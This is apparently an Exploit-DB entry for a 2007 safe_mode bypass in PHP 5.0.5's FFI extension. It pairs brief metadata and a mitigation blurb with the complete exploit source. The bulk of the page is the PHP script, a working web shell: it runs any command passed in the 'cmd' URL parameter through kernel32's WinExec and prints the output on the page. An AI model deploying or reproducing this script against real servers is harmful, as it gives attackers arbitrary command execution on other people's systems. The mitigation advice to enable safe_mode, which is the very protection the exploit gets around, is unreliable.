PHP FFI Extension Safe_mode Bypass Exploit

vendor:

PHP

by:

NetJackal

7.5

CVSS

HIGH

Safe_mode Bypass

284

CWE

Product Name: PHP

Affected Version From: PHP 5.0.5

Affected Version To:

Patch Exists: NO

Related CWE:

CPE: a:php:php:5.0.5

Metasploit:

Other Scripts:

Platforms Tested:

2007

PHP FFI Extension Safe_mode Bypass Exploit

This PHP script exploits a vulnerability in the PHP FFI extension to bypass the safe_mode restriction. It allows an attacker to execute arbitrary commands on the target system by passing the command as a parameter in the URL. The script checks if the FFI extension is loaded and then proceeds to execute the command using the WinExec function from the kernel32.dll library. The output of the command is stored in a temporary file, which is read and displayed on the web page. The temporary file is then deleted.

Mitigation:

The FFI extension is no longer supported in modern versions of PHP. It is recommended to update to a supported version and remove the FFI extension if it is present. Additionally, enabling safe_mode in PHP configuration can help mitigate the risk of this vulnerability.

Source

Exploit-DB raw data:

<?php

##########################################################
###----------------------------------------------------###
###-----PHP FFI Extension Safe_mode Bypass Exploit-----###
###----------------------------------------------------###
###-Tested on 5.0.5------------------------------------###
###----------------------------------------------------###
###-Usage:-http://victim.net/NJ.php?cmd=[COMMAND]------###
###----------------------------------------------------###
###-PHP:-http://php.net--------------------------------###
###-FFI:-http://pecl.php.net/package/ffi---------------###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################

if(!extension_loaded('ffi'))
die('ERROR: FFI extension is not loaded!');
$command=(empty($_GET['cmd']))?'dir':$_GET['cmd'];
if(is_writeable(dirname(__FILE__)))$tmp=dirname(__FILE__);
elseif(is_writeable(ini_get('session.save_path')))
$tmp=ini_get('session.save_path');
elseif(is_writeable(ini_get('upload_tmp_dir')))
$tmp=ini_get('upload_tmp_dir');
else die('ERROR: Move exploit to writeable folder.');
$output="$tmp\\".uniqid('NJ');
$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res=$api->WinExec("cmd.exe /c $command >\"$output\"",0);
while(!file_exists($output))sleep(1);
$con='';
$fp=fopen($output,'r');
while(!feof($fp))$con.=fgets($fp,1024);
fclose($fp);
$con=htmlspecialchars($con);
echo "<pre>$con</pre>";
unlink($output);
?>

# milw0rm.com [2007-08-23]